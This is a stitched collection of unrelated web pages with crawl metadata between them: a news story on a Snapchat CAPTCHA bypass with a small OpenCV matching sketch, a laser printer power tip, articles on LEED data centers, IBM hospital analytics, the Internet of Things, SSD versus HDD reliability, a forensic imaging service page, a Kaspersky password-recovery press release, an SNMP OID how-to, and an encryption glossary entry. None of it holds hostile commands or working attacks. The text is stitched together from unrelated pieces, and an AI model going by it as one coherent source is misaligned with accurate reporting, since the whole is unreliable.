Hickson provides the technical details of the hack on his blog. In general, he used Intel's Open Source Computer Vision Library (OpenCV) and a couple of other supporting technologies, to build the program capable of identifying the Snapchat mascot in the illustrations. OpenCV is a library of programming functions that are aimed at giving computers the ability to identify images.
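To make the template-matching idea concrete, here is a minimal sketch in Python with OpenCV. It is not Hickson's actual program, the image file names are placeholders, and the 0.8 threshold is an arbitrary illustrative value.

```python
# Minimal template-matching check: look for a known mascot image inside one
# of the nine CAPTCHA tiles. File names are hypothetical placeholders.
import cv2

template = cv2.imread("ghost_template.png", cv2.IMREAD_GRAYSCALE)  # known ghost image
tile = cv2.imread("captcha_tile.png", cv2.IMREAD_GRAYSCALE)        # one candidate tile

# Slide the template over the tile and score how well each position matches.
result = cv2.matchTemplate(tile, template, cv2.TM_CCOEFF_NORMED)
_, max_score, _, _ = cv2.minMaxLoc(result)

# If the best score clears a (hand-picked) threshold, assume the ghost is present.
print("contains ghost" if max_score > 0.8 else "no ghost")
```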
Zach Lanier, senior security researcher for mobile authentication specialist Duo Security, said Hickson's CAPTCHA bypass is "totally legitimate."
"In my opinion, if Snapchat is really concerned about improving security, they should take some lessons from Hickson's findings," Lanier said.
Chris Grayson, senior security analyst for consultancy Bishop Fox, agreed, saying "the CAPTCHA mechanism that they implemented is decidedly weak, as demonstrated by Steven Hickson's proof-of-concept, and offers little additional security to Snapchat users."
Snapchat did not respond to a request for comment.
Mobile app developers have become notoriously weak in building adequate security to protect users' personal information. Recent studies have shown serious weaknesses in data protection in mobile apps built by small vendors, as well as airlines, retail outlets, entertainment companies, insurance companies and financial institutions.
Mobile app security is often given a lower priority than rolling out features, because there has not been a major breach where valuable financial data has been stolen from a smartphone. However, the risk of such a breach will rise as the number of purchases made with a smartphone increases, along with the value of the data stored on the devices.
While security will slow down the app development process, "it's extremely necessary," Hickson said.
Hickson's work follows on the heels of another incident in which hackers exploited a weakness in Snapchat's feature for finding friends by displaying the usernames of people whose phone numbers match those in other users' address books. Hackers used the vulnerability to steal the usernames and phone numbers of more than 4 million users.
Snapchat updated the app to let users opt out of having their phone numbers linked to their usernames. In addition, people are now required to verify their phone number before using the service called "Find Friends."
This story, "Snapchat falters on security again, experts say" was originally published by CSO. | <urn:uuid:d64d54f1-4443-47fd-9f75-0ee420e38d08> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2173807/byod/snapchat-falters-on-security-again--experts-say.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00373-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953484 | 778 | 2.6875 | 3 |
When finding a location to set up a laser printer, one commonly overlooked consideration is power.
Most often I see laser printers placed in a location where the printer is connected to the same power circuit that has other devices plugged in, such as a computer.
Laser printers should, whenever possible, be plugged into their own dedicated circuit.
When printing, laser printers consume a lot of power. If another device, such as a computer, is plugged in to the same circuit, there is a risk that the printer can cause power issues, such as a “brownout”. A brownout is a momentary drop, but not a complete loss of power. This drop can cause serious damage to the computer, and the parts inside.
Laser printers should also never be plugged in to a battery backup device, or UPS. The power used by a laser printer while printing can damage the battery inside, and may void the warranty.
These considerations only apply to laser printers. Other printers such as inkjet or dot-matrix printers consume a lot less power, and do not pose a risk to other equipment plugged in to the same circuit. | <urn:uuid:37b569da-82fc-4550-bc50-0883749bc2ec> | CC-MAIN-2017-04 | http://wiki.sirkit.ca/2013/01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00097-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939023 | 234 | 2.8125 | 3 |
What is LEED Certification for Data Centers?
Leadership in Energy and Environmental Design (LEED), developed by the US Green Building Council, is a set of rating systems for the design, construction, operation and maintenance of green buildings. The certifications come as Silver, Gold and Platinum, and the highest Platinum certification indicates the highest level of environmentally responsible construction with efficient use of resources.
Over the years, LEED has become more popular and is now an internationally accepted standard for "green buildings." While LEED certified homes, commercial buildings and even neighborhoods are present across the world, LEED data centers are surprisingly rare. Less than 5% of all US data centers have LEED certification. This, however, is changing, and more and more data centers are now becoming LEED certified, thanks to the growing awareness of environmental issues.
A single word to describe LEED certified data centers is "sustainable." Here are some characteristics of a typical LEED certified data center.
- Advanced cooling system to reduce energy consumption. This could be implemented in different ways, such as using outside air and cooling it by evaporation to cool the facility, deploying custom servers that operate at higher temperatures and using cold air containment pods with variable speed fans to match airflow with server requirements.
- Improved cooling efficiency. Using a chilled water storage system, for instance, has the potential to shift up to 10,400 kWh of electricity consumption from peak to off-peak hours daily and, therefore, improves cooling efficiency.
- Reduced energy consumption. Monitoring power usage in real time and leveraging analytics during operations helps to allocate power judiciously. Distributing power at higher voltages reduces power loss, and eliminating energy-draining transformers helps to convert power to the appropriate voltage and reduce the generation of heat. The overall aim is to maintain a low power usage effectiveness (PUE), which is the ratio of total facility energy to the energy consumed by the IT equipment itself (a short worked example follows this list).
- Using a clean backup power system. One innovative approach is replacing the football field sized room full of batteries that powers the uninterrupted power supply with mechanical fly wheels and a diesel engine. This reduces emissions, noise pollution and fuel consumption.
- Using renewable energy. Extensive use of renewable energy, such as solar power, to reduce dependence on the grid and fossil fuels is a characteristic of all green data centers, moreso when aspiring for LEED certification.
- Green construction. Construction of the facility also influences LEED certification. Using recycled materials for construction, purchasing materials near the site to reduce consumption of fossil fuels and diverting construction waste to nearby landfills reflects positively on LEED ratings.
- Intelligent design. Adopting an in-row design confines the heat to a smaller area, reducing the space to cool and, therefore, reducing electricity consumption considerably. Similarly, a modular design helps to contain cooling only to the required area instead of cooling the entire facility.
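To make the PUE figure mentioned above concrete, here is a short worked example with made-up numbers.

```python
# Illustrative PUE calculation (numbers are invented for the example).
# PUE = total facility energy / energy delivered to the IT equipment.
it_energy_kwh = 1_000_000              # servers, storage and network gear
total_facility_energy_kwh = 1_500_000  # IT load plus cooling, lighting, power losses

pue = total_facility_energy_kwh / it_energy_kwh
print(f"PUE = {pue:.2f}")              # 1.50 here; values closer to 1.0 mean less overhead
```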
While LEED does not force data centers to follow specific methods of cooling, reducing energy consumption and the like, each rating system is made up of a combination of credit categories, and each credit category has specific prerequisites that the data center has to satisfy. The number of points the project earns determines the level of LEED certification.
To learn more about data center certifications, check out our Certifications and Qualifications page. | <urn:uuid:8a34556e-2b0a-4492-9234-378d42e096c8> | CC-MAIN-2017-04 | http://www.lifelinedatacenters.com/data-center/leed-certification-data-centers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00401-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927543 | 685 | 2.890625 | 3 |
Originally published June 4, 2010
IBM announced a collaboration with South China's largest hospital, Guang Dong Hospital of Traditional Chinese Medicine, to apply new analytics technology to help doctors uncover trends and new knowledge about disease treatment from thousands of anonymous electronic medical records (EMR). The tool will also enable clinicians to perform empirical studies on the efficacy of certain traditional Chinese treatments.
While more and more health data is available through EMRs and other systems, it can be difficult and time-consuming for clinicians to extract and compile relevant patient data in a way that allows them to quickly pinpoint critical issues and detect patterns in the data.
To help solve this problem, scientists at IBM Research have built a first-of-a-kind system called Healthcare Information Warehouse for Analytics and Sharing that clinicians at Guang Dong Hospital of Traditional Chinese Medicine will use to study the effects of Traditional Chinese Medicine in conjunction with Western medicine in treating Chronic Kidney Disease (CKD).
The tool stores and synthesizes anonymized patient data and provides doctors with detailed reports that correlate patients' conditions with demographics such as age and gender, as well as with the presence of other health conditions, like heart disease or diabetes. The ability to extract, sift through and combine relevant patient data and clinical events should help doctors customize treatment plans and provide them an understanding of how different populations are affected by and respond to medical treatments. The system may also assist researchers in conducting in-depth analysis of data for clinical and operational studies.
"As more and more medical data becomes available through electronic medical records and interoperable systems, there is a real opportunity for doctors and clinicians to use the information in new ways for improved patient care," said Lu Yu Bo, president, Guang Dong Hospital of Traditional Chinese Medicine.
Hypertension and diabetes are major public health challenges worldwide, particularly in the United States and China, and are two of the primary causes of CKD, a progressive loss of kidney function. For example, it is estimated that about 40 percent of people with diabetes will develop CKD. And, according to the U.S. Centers for Disease Control, CKD affects about 17 percent of all adults over the age of 20 in the United States. Researchers have chosen to focus on the condition not only because of the number of persons it affects, but also because few Western treatments for the disease exist.
The analytics solution follows the creation of another first-of-a-kind system created by IBM for Guang Dong Hospital. Known as the Clinical Health Records Analytics and Sharing, the health records technology tool was launched in 2009 to enable the sharing of electronic medical records across the hospital network and the integration of Eastern and Western medicine into one standardized system. Healthcare Information Warehouse for Analytics and Sharing can be used as an extension of the Clinical Health Records Analytics and Sharing tool or as a standalone system.
"Evidence-generation is a key step towards making raw health data more usable for clinicians at the point of care," said Bill Cody, senior manager, healthcare informatics, IBM Research - Almaden. "Our collaboration with Guang Dong Hospital will make it easier for physicians to extract and analyze key data about chronic disease treatment, paving the way for evidence-based and more cost-effective medicine."
The new tool also marks a significant technical achievement because of its ability to input and analyze large collections of complex XML-based documents, making the information they contain easily accessible using current IBM business intelligence technologies including Cognos, Infosphere and SPSS. In the future, the hospital also plans to study additional acute and chronic diseases. The system has also been designed with more flexibility and extensibility than other systems, allowing for uses outside of healthcare including finance, energy utilities and other industries that find benefit from analyzing large amounts of complex XML data.
IBM's track record of improving healthcare through scientific achievements and collaboration with healthcare companies dates back to the 1950s. In the last decade, IBM has collaborated with Scripps to understand how influenza viruses mutate, worked with European universities to develop better HIV antiretroviral therapy methods and launched the World Community Grid, which has done projects on cancer, AIDS, dengue fever among other healthcare innovations. | <urn:uuid:baa82b23-79c7-4d2a-a1a9-ceea09513512> | CC-MAIN-2017-04 | http://www.b-eye-network.com/channels/1544/view/13947 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00125-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942092 | 845 | 2.953125 | 3 |
Unless specialized software is used, the simple act of booting a computer system is almost certain to change data on disk drives connected to the computer. This results in the contamination of digital evidence and often causes vast amounts of data to be destroyed or altered before it can be copied.
Copying files or backing up a disk drive are ineffectual forensic methods for a variety of reasons. Deleted files are not copied, nor are files or partitions that are hidden. Often times, backup programs modify the attributes of files and folders by flagging them as having been backed up.
The forensic methodology employed by ASR Data is completely non-invasive to the original evidence and does not change any data on disk sub-systems before, during or after the data acquisition process. All information is copied, including deleted files, unallocated disk space, slack space and partition waste space.
Gaining access to a disk drive non-invasively may be accomplished in several ways, depending on various technical configurations. Often times, the fastest and easiest way to image an internal disk drive is to remove it from its native environment and connect it to a computer which has had its hardware and software optimized to support the forensic process. Alternatively, the drive may be left in the computer and the computer booted using a modified version of an operating system which has been “neutered” to prevent it from changing any data on disk drives connected to the computer.
Providing a quantifiable measurement of authenticity and integrity of data is essential for satisfying admissibility standards such as Federal Rules of Evidence – Article X – Rule 1003 and Federal Rules of Evidence – Article IX – Rule 901.
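One common way to provide such a quantifiable measurement is to record a cryptographic hash of the acquired image and recompute it whenever integrity must be demonstrated. The sketch below is a generic Python illustration, not a description of ASR Data's proprietary process, and the file name is a placeholder.

```python
# Compute a SHA-256 digest of an acquired disk image so the copy can later be
# re-verified against the recorded value. The file name is a placeholder.
import hashlib

def sha256_of(path, chunk_size=1024 * 1024):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

print("SHA-256:", sha256_of("evidence_image.dd"))
# Recomputing the digest later and comparing it to the recorded value shows
# whether the image has changed since acquisition.
```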
The data acquisition and authentication protocol employed by ASR Data has been developed to facilitate the discovery process and addresses issues raised in Federal Rules of Civil Procedure, Rules 26 and 34.
ASR Data integrates digital evidence and chain of custody information and extends the authentication paradigm to include the embedded chain of custody information.
ASR Data’s methodology is fault tolerant and can authenticate data on damaged media. The protocol also supports the exclusion of privileged information while retaining the ability to acquire, authenticate and analyze desktops, laptops, servers, mobile devices and many types of removable media and optical data storage mediums.
ASR Data has developed tools and techniques that allow us to recover data other utilities and data recovery companies miss. More than simply recovering deleted files, our advanced tools and techniques allow us to defeat passwords, discern subtle patterns of computer usage and much more.
Reconstructing an accurate history of computer activity and identifying the “signature” of user initiated actions requires an in depth understanding of computer operating systems, file systems and disk storage subsystems.
ASR Data employs a standardized scientific methodology that has been proven to be sound, effective and reliable. Optimized to anticipate a wide variety of legal foundation and theoretical challenges, our findings and opinions are virtually incontrovertible.
Information obtained from the technical analysis of a computer may be of little practical value unless the information can be effectively disseminated. The presentation of information is often times as important as the information itself. Findings and opinions are presented in clear, concise terms.
Call us at (512) 918-9227 or schedule a free consultation | <urn:uuid:959dbdd3-410e-4539-ae11-7b1415151df9> | CC-MAIN-2017-04 | http://www.asrdata.com/litigation-support/forensic-methodology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00033-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927579 | 672 | 3.140625 | 3 |
Kaspersky Lab announces that its experts have developed and patented an advanced technology to recover passwords and encryption keys on mobile devices. Patent No. 2481632, issued by Rospatent, describes a method that almost eliminates any possibility of data compromise.
Encryption is an extremely safe method of protecting confidential data, and it is widely used by both corporations and personal users. However, there is a disadvantage in its application: people forget and lose the passwords to access encrypted data. On the one hand this highlights the perils of losing passwords – if a password cannot be restored, the encrypted data also remains inaccessible. On the other hand, a recoverable password increases the risk of valuable data being compromised. Keep in mind that the methods used by vendors to protect backup copies may contain vulnerabilities which could allow unauthorized access to secret data.
As a result, consumers usually have to choose the lesser of two evils. Either use extremely well-protected solutions that do not forgive any human error and do not allow password recovery, or place your trust in the reliability of your vendor’s IT infrastructure if it allows password recovery.
Kaspersky Lab sought to avoid this compromise by developing its own technology to recover passwords and encryption keys on mobile devices.
Three independent factors
In order to recover passwords and keys for encrypted data, the Kaspersky Lab patented technology uses three independent factors: user ID, a mobile device ID and a random number.
When the user first installs the mobile security solution, the authentication system asks for an email address. The technology then hashes the address (producing the sequence of symbols that results from converting the alphanumeric email address using a special algorithm). In addition, it creates a unique ID for the device based on its hardware characteristics and finally generates a random number. After registration, the encrypted random number together with the hashed email address and the device ID is transmitted to Kaspersky Lab's servers.
The random number is used by the product in order to provide a "defense of the defense". The technology uses a special data encryption key. The key itself also needs to be protected by encryption to ensure its safety. Usually the key is protected by a user password. Whenever a user enters the password, the key is decrypted first and only then comes the turn of the information encrypted with it. Therefore, if the password is lost or forgotten, the information is almost impossible to decrypt. The patented technology can store two copies of keys on the device: the primary copy is encrypted with the help of the user password and the backup copy is encrypted using the previously generated random number.
If the user of the device loses or forgets the password, the special password recovery service asks for the email address. The service identifies the hashed address and checks it against its own hash database previously collected from all users with this technology integrated in their mobile security solutions. If a match is found, the system sends the unique number specified by the user during registration to that email address, together with instructions for creating a new password. The technology uses this unique number to decrypt the backup key, which in turn allows the user to access the data stored on the device.
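The toy sketch below illustrates the general dual-wrapped-key idea described above. It is not Kaspersky Lab's implementation; the password, salt handling and key-derivation parameters are illustrative assumptions only.

```python
# The data key is stored twice: once wrapped with a password-derived key and
# once wrapped with a key derived from a server-held random number.
import base64, hashlib, os
from cryptography.fernet import Fernet

def kdf(secret: bytes, salt: bytes) -> bytes:
    raw = hashlib.pbkdf2_hmac("sha256", secret, salt, 200_000)
    return base64.urlsafe_b64encode(raw)    # Fernet expects a base64-encoded 32-byte key

salt = os.urandom(16)
data_key = Fernet.generate_key()            # key that actually encrypts the user's data

primary_copy = Fernet(kdf(b"user-password", salt)).encrypt(data_key)

random_factor = os.urandom(32)              # held by the recovery service in the real scheme
backup_copy = Fernet(kdf(random_factor, salt)).encrypt(data_key)

# If the password is lost, releasing random_factor unwraps the backup copy:
recovered = Fernet(kdf(random_factor, salt)).decrypt(backup_copy)
assert recovered == data_key
```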
As a result, Kaspersky Lab specialists were able to develop a data recovery algorithm which is convenient and at the same time secure, since none of the parties involved in this process has access to all the data required to decrypt the secret information. Kaspersky Lab stores neither the password backups nor any copies of keys, nor even any personal customer data on its servers – it keeps only encrypted values of specific information that helps users to access their data. These values are completely useless to cybercriminals.
"No matter how well the key to the safe is protected, if a cybercriminal gains access to that key, he gains access to the safe. However, if you split the key into the components and hide them in different parts of the world, cybercriminals are likely to go and look for another safe that is easier to crack. Our technology works in a similar way: it ‘hides’ the elements necessary to access sensitive data in different places and under different conditions. When the users need it, these elements can ‘come together’ in a single place. This takes no special effort from the user, but a cybercriminal faces a real struggle to piece together all the different elements of the ‘key’,” said Victor Yablokov, Head of Web & Messaging Development at Kaspersky Lab, one of the creators of the technology.
Kaspersky Lab continues to successfully increase its intellectual property. As of the end of June 2013, the company’s portfolio included over 120 patents issued by patent authorities in the US, Russia, China and Europe. Another 200 patent applications are currently being examined by the patent offices of these countries. | <urn:uuid:d43b4ce7-9fbc-481c-96c0-38563ecc4f8e> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/press/2013/Kaspersky_Lab_patents_its_technology_for_easy_and_secure_recovery_of_encrypted_data | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00033-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.928966 | 981 | 2.765625 | 3 |
SSD vs. HDD: Performance and Reliability - Page 2
Now, in practice those higher percentages are not earth shattering. Most modern storage has redundant technology that minimizes data damage from a failed disk and allows hot replacements. But when you are talking about drive reliability, clearly that number is worth talking about.
Again, small blame to the HDD vendors for putting their best foot forward. No one really expects them to publish reams of data on how often their products fail… especially since the SSD vendors do the same thing. And on the whole, HDDs tend to fail more gracefully in that there may be more warning than a suddenly failing SSD. This does not negate the huge performance advantages of SSD but does give one pause.
SSD’s Reliability Failures
Some SSD failures are common to any storage environment, but they do tend to have different causes than HDD failures. Common points of failure include:
· Bit errors: Random data bits stored to cells, although it sounds much more impressive to say that the electrons leaked.
· Flying or shorn writes: Correct writes written in the wrong location, or truncated writes due to power loss.
· Unserializability: A hard-to-pronounce term that means writes are recorded in the wrong order.
· Firmware: Ah, firmware. Firmware fails, corrupts, or upgrades improperly throughout the computing universe: SSD firmware is no exception.
· Electronic failures: In spite of no moving parts, physical components like chips and transistors fail, taking the SSD down right along with it.
· Power outages: DRAM SSDs have volatile memory and will lose data if they lack a battery power supply. NAND SSDs are also subject to damaged file integrity if they are reading/writing during power interruptions.
As SSDs mature, manufacturers are improving their reliability processes. Wear leveling is a controller-run process that tracks data movement and component wear across cells, and levels writes and erases across multiple cells to extend the life of the media. Wear leveling maps logical block addresses (LBA) to physical memory addresses. It then either rewrites data to a new block each time (dynamic), or reassigns low usage segments to active writes (static) in order to avoid consistent wear to the same segment of memory. Note that writes are not the only issue: so is deletion. HDDs can write and read from the same sector, and in case of modified data can simply overwrite the sector. SSDs don’t have it this easy: they cannot overwrite but must erase blocks and write to new ones.
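A highly simplified model of the logical-to-physical remapping behind wear leveling is sketched below; real controllers do this in firmware with far more sophistication (block state tracking, erase scheduling, static wear leveling and so on).

```python
# Toy wear-leveling model: repeated writes to one logical block address (LBA)
# are redirected to the least-worn free physical block, and only the mapping
# is updated instead of overwriting the same block in place.
NUM_BLOCKS = 8
erase_counts = [0] * NUM_BLOCKS      # wear accumulated per physical block
lba_to_physical = {}                 # logical address -> physical block

def write(lba):
    in_use = set(lba_to_physical.values())
    free = [b for b in range(NUM_BLOCKS) if b not in in_use]
    target = min(free, key=lambda b: erase_counts[b])   # least-worn free block
    erase_counts[target] += 1        # each rewrite eventually costs an erase cycle
    lba_to_physical[lba] = target    # the previously used block is freed for GC
    return target

for _ in range(20):
    write(3)                         # hammering one LBA still spreads wear around
print(erase_counts)
```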
Data integrity checks are also crucial to data health. Error correction code (ECC) checks data reads and corrects hardware-based errors to a point. Cyclic Redundancy Check (CRC) checks written data to be sure that it is returned intact to a read request. Address translation guards against location-based errors by verifying that a read is occurring from the correct logical address, while versioning retrieves the current version of data.
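The essence of a CRC-style integrity check fits in a few lines. The example below uses Python's built-in CRC-32 purely for illustration; it is not the actual code a drive computes internally.

```python
# Store a checksum with the data at write time, recompute it at read time,
# and flag any mismatch as a corrupted read.
import zlib

data = b"sector payload"
stored_crc = zlib.crc32(data)               # recorded alongside the written data

corrupted = b"sector pay1oad"               # simulate a bit/byte error on read
print(zlib.crc32(data) == stored_crc)       # True  - the read verifies
print(zlib.crc32(corrupted) == stored_crc)  # False - the error is detected
```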
Garbage collection helps to reclaim sparsely used blocks. NAND SSD only writes to empty blocks, which will quickly fill up an SSD. The firmware can analyze the cells for partially filled blocks, merge data into new blocks, and erase the old ones to free them up for new writes.
Data redundancy is also a factor. External redundancy of course occurs outside of the SSD with backup, mirroring, replication, and so on. Internal redundancy measures include internal batteries in DRAM SSDs, and striped data parity in NAND flash memory.
So Which Wins, SDD or HDD?
SSDs are clearly faster in performance, and if an HDD vendor argues otherwise then consider the source. However, reliability is an ongoing issue outside of hostile environments. We find that SSD reliability is improving and is commensurate with, or moving slightly ahead of, HDDs. SSD warranties have stretched from 3 to 5 years with highly reliable Intel leading the way. Intel and other top NAND SSD manufacturers like Samsung (at present, the world’s largest NAND developer), Kingston and OCZ are concentrating on SSD reliability by improving controllers, firmware, and troubleshooting processes.
The final score between NAND/DRAM SSDs and HDDs? Costs are becoming comparable. Reliability is about the same. Performance is clearly faster, and should rule the final decision between SSD and HDD. Hard drives will have their place for a long time yet in secondary storage, but I believe that they have already lost their edge in high IO computing. For that, look to SSDs.
Photo courtesy of Shutterstock. | <urn:uuid:177e2852-072e-48c9-8c87-cb69682e7c77> | CC-MAIN-2017-04 | http://www.enterprisestorageforum.com/storage-hardware/ssd-vs.-hdd-performance-and-reliability-2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00519-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934343 | 952 | 2.78125 | 3 |
Microsoft founder Bill Gates became a multibillionaire by making computers a common fixture in households and businesses around the globe.
Now the software entrepreneur's charitable organization hopes to turn the same trick with a device that most Westerners take for granted, but which is a rarity in two-thirds of the world.
The Bill & Melinda Gates Foundation has announced an initiative to promote the spread of safe and affordable sanitation in developing nations:
In a keynote address at the 2011 AfricaSan Conference in Kigali, Sylvia Mathews Burwell, president of the foundation's Global Development Program, called on donors, governments, the private sector, and NGOs to address the urgent challenge, which affects nearly 40 percent of the world's population. Flush toilets are unavailable to the vast majority in the developing world, and billions of people lack a safe, reliable toilet or latrine. More than a billion people defecate in the open. "No innovation in the past 200 years has done more to save lives and improve health than the sanitation revolution triggered by invention of the toilet," Burwell said in her speech at AfricaSan. "What we need are new approaches. New ideas. In short, we need to reinvent the toilet."
This is no joke. Poor sanitation is a leading cause of disease and death in underdeveloped nations. Anyone who has traveled through poor nations can attest to the abysmal conditions facing their impoverished citizens every single day. There's literally no escape.
According to the Foundation, 1.5 million children die annually from diarrheal disease. Proper sanitation, in conjunction with safe drinking water (another big problem) and improved hygiene could prevent "most of these deaths," the Foundation said in a statement.
The Gates's aren't just proselytizing. They're putting money behind the effort:
* A $3 million grant supporting eight universities in Africa, Asia, Europe and North America to finance efforts to "reinvent the toilet as a stand-alone unit without piped-in water, a sewer connection, or outside electricity—all for less than 5 cents a day."
* $42 million in new sanitation grants designed to "spur innovations in the capture and storage of waste, as well as its processing into reusable energy, fertilizer, and fresh water."
Beyond the obvious humanitarian aspects of this endeavor, the Foundation notes that proper sanitation is a sound economic investment, citing a World Health Organization study showing that each dollar invested can return $9 by making people healthier and more productive. Better sanitation cuts health care costs and reduces illness, disease, disability and premature death.
Say what you will about Gates and his business practices as co-founder and long-time CEO of Microsoft -- and fellow co-founder Paul Allen recently had plenty to say, not much of it positive -- the guy is trying to use some of his wealth these days to accomplish some good. You've got to give him that much. | <urn:uuid:373e96aa-ffc9-4cac-9d53-37584cdffb14> | CC-MAIN-2017-04 | http://www.itworld.com/article/2739748/hardware/bill-gates--toilet-evangelist.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00337-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958786 | 597 | 2.984375 | 3 |
A Brief History of the Internet of Things
Over the last few years, the Internet of things has evolved from an intriguing concept into an increasingly sophisticated network of devices and machines. As more and more "things" get connected to the Internet—from Fitbit activity monitors and home lighting systems to industrial machines and aircraft—the stakes grow exponentially larger. Cisco Systems estimates that approximately 12.1 billion Internet-connected devices were in use in April 2014, and that figure is expected to zoom to above 50 billion by 2020. The networking firm also notes that about 100 things currently connect to the Internet every second, and the number is expected to reach 250 per second by 2020. Eventually, the IoT will encompass about 99 percent of all objects, which currently totals approximately 1.5 trillion things. "The IoT holds potential for disruptive change," says Gilad Meiri, CEO of tech startup Neura. "The evolution of the technology will likely be faster than the Internet." Following is a brief timeline of important IoT events. | <urn:uuid:8bf49dfd-41ae-475e-9eba-cc75962b23b6> | CC-MAIN-2017-04 | http://www.baselinemag.com/networking/slideshows/a-brief-history-of-the-internet-of-things.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00153-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960875 | 202 | 2.984375 | 3 |
Before we can get started finding a OID we need to have a basic understanding of a few things. These topics are SNMP, MIB, OID and a MIB browser. If you understand these topics you can skip this.
Let's first talk about SNMP. SNMP stands for Simple Network Management Protocol. SNMP is a protocol that is used to transport SNMP requests in the form of a Get or Set, as well as other types we won't cover here. An SNMP Get is a request for data, and an SNMP Set is a request to change something. If we wanted to look at the sysName of a switch we would need to send an SNMP Get for ".1.3.6.1.2.1.1.5.0" to the device. This seemingly random number is called an Object Identifier (OID), and this one identifies the sysName of an SNMP device as defined by RFC1213 (MIB-II). If you wanted to change the sysName you would send an SNMP Set to ".1.3.6.1.2.1.1.5.0" with the new value for the sysName.
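A Get like this can also be scripted instead of typed into a MIB browser. The sketch below uses the third-party pysnmp library; the switch address and community string are placeholders.

```python
# Minimal SNMP Get for sysName.0 (.1.3.6.1.2.1.1.5.0) over SNMP v2c.
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

error_indication, error_status, error_index, var_binds = next(
    getCmd(SnmpEngine(),
           CommunityData("public"),                          # placeholder community string
           UdpTransportTarget(("10.0.0.1", 161)),            # placeholder switch IP, SNMP port
           ContextData(),
           ObjectType(ObjectIdentity("1.3.6.1.2.1.1.5.0")))  # sysName.0
)

if error_indication:
    print(error_indication)
else:
    for var_bind in var_binds:
        print(var_bind)   # e.g. SNMPv2-MIB::sysName.0 = my-switch
```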
Now that we know enough about SNMP, let's move on to what an OID and a MIB file are. We know that an OID is an Object Identifier that can be defined by RFCs. Extreme Networks also has vendor-specific OIDs for each EXOS version that cover more data collection points than what RFC1213 (MIB-II) covers. I'm sure you're asking yourself, "How am I supposed to know that ".1.3.6.1.2.1.1.5.0" is for getting or changing the sysName?" Well, it's not hard when you have a MIB file and a MIB browser.
A MIB file is a text file that defines all the OIDs available in that file. If you look at this file it will be hard to understand, which is fine. That is why MIB browsers were made: to interpret MIB files and make it easier to understand each OID. Each OID will have a name and a description, as well as whether SNMP Gets or Sets are accepted. Most MIB browsers also have a built-in feature to send SNMP Gets and Sets, which is great when looking for the right OID. Using the find feature ("Ctrl+F") is very helpful in finding the correct OID you need.
1. Download any third-party MIB browser. iReasoning is free for non-commercial use. The iReasoning MIB browser and Extreme Management MIB Tools will have most of the RFC standard MIB files included.
2. Download the EXOS MIB. The EXOS MIB files are version specific, so make sure you download the MIB file for the switch version you plan to poll. You can find the EXOS version using the "show switch" command in EXOS. You can also follow the "How to Obtain and Upgrade EXOS" article to download the MIB file.
3. Once you have the MIB file you will need to import/load the MIB file into any third party MIB browser.
4. Once loaded, you can browse the folder structure or search with a keyword until you get to the MIB object you need. For example, to find the OID for "extremeCpuAggregateUtilization", you could use "CPU" as the search keyword.
5. Once you have found the correct OID description in the MIB browser, you should be able to see the OID value. If you're looking for a specific port counter, you can use an SNMP GetBulk to see which OID it is. | <urn:uuid:46fc099f-83f2-4ad4-aeff-744288912e03> | CC-MAIN-2017-04 | https://gtacknowledge.extremenetworks.com/articles/How_To/How-to-find-OID-for-a-particular-MIB | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00455-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915736 | 813 | 3.265625 | 3 |
Encryption is a process of translating a message, called
the Plaintext, into an encoded message, called the Ciphertext.
This is usually accomplished using a secret Encryption Key
and a cryptographic Cipher.
Two basic types of Encryption are commonly used:
- Symmetric (secret key) Encryption, where the same secret Encryption Key is used both to encrypt and to decrypt the message.
- Asymmetric (public key) Encryption, where a public key is used to encrypt the message and a different, mathematically related private key is used to decrypt it.
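As a small illustration of the symmetric case, the sketch below uses the Python "cryptography" package; the library choice is just one of many possibilities.

```python
# The same secret key both encrypts the Plaintext into the Ciphertext and
# decrypts it back again.
from cryptography.fernet import Fernet

key = Fernet.generate_key()          # the secret Encryption Key
cipher = Fernet(key)                 # the cryptographic Cipher

ciphertext = cipher.encrypt(b"attack at dawn")   # Plaintext -> Ciphertext
plaintext = cipher.decrypt(ciphertext)           # Ciphertext -> Plaintext
print(plaintext)                     # b'attack at dawn'
```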
Some interesting politics surround strong Encryption:
- Strong (i.e., hard to break) Encryption algorithms are considered to be munitions by the United States government. Exporting such algorithms therefore amounts to arms smuggling -- a very serious offence!
- Some countries (e.g., France) forbid their citizens from using strong Encryption.
- Strong encryption algorithms are freely available everywhere in the world, on the Internet.
